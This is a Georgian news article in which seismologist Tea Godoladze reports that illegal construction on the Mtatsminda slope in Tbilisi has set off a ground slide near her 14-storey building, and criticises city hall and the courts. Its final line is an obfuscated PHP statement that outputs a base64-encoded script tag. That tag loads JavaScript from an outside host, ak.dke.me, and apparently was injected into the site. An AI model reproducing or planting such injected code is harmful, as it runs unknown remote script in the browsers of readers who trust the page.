celsiusi
ავერსი საქკაბელი
დედამიწის შემსწალელ მეცნიერებათა ინსტიტუტის და სეისმუტი მონიტორინგის ეროვნული ცენტრის დირექტორი თეა გოდოლაძე აცხადებს, რომ მისი საცხოვრებელი კორპუსის უკან მთაწმინდის ფერდზე უკანონო და საშიში მშენებლობა მიმდინარეობს და დღეს მიწა ჩამოწვა. ამის შესახებ გოდოლაძემ, საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა. 
 
მისივე ინფორმაციით, ის თავიდანვე მიმართავდა მერიას თხოვნით, რომ არ გაეცათ მშენებლობის ნებართვა აღნიშნულ ტერიტორიაზე.
 
“აბსოლუტურად დანაშაულებრივი მშენებლობა, სასამართლოში შევიტანეთ სარჩელი, 6 თვეა პროცესი ვერ ჩანიშნეს.  მშენებელი მაინც აშენებს და დღეს უკვე გრუნტი წამოვიდა ჩემს საკუთარ სახლთან, სად ვეძებოთ სამართალი! არქტიექტურის სამსახურის უფროსმა თბილისის მერიაში, რას ამბობ თეა მანდ როგორ გავცემ ნებართვასო, თემურ ბოლოთაშვილმა და 2 კვირაში ნებართვა გასცა! “ყუფარაძემ” დაურეკა? გამაგებინეთ ვინ არის ასეთი ეს ყუფარაძე, სასამართლოსაც რომ ეშინია?! აღარ ვიცი რა გავაკეთო, გამოვიძახეთ მერიის მუნიციპალური სამსახური. ადგილზე პოლიციაც იმყოფებოდა. მოვიდა მერიის სამსახურის წარმომადგენელიც და დაგვპირდა, რომ გამაგრებითი სამუშაობი ჩატარდება”, - განაცხადა თეა გოდოლაძემ. 
 
 
მისივე განმარტებით, გამაგრებითი სამუშაოები უნდა ჩატარდეს, თუმცა იქ მშენებლობა ყველა შემთხვევაში შესაჩერებელია.
 
“იქ თუ მშენებლობა გაგრძელდა, ის მიწა მოადგება ჩვენს 14 სართულიან კორპუსს”, - აღნიშნა გოდოლაძემ.
 
 
1707
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");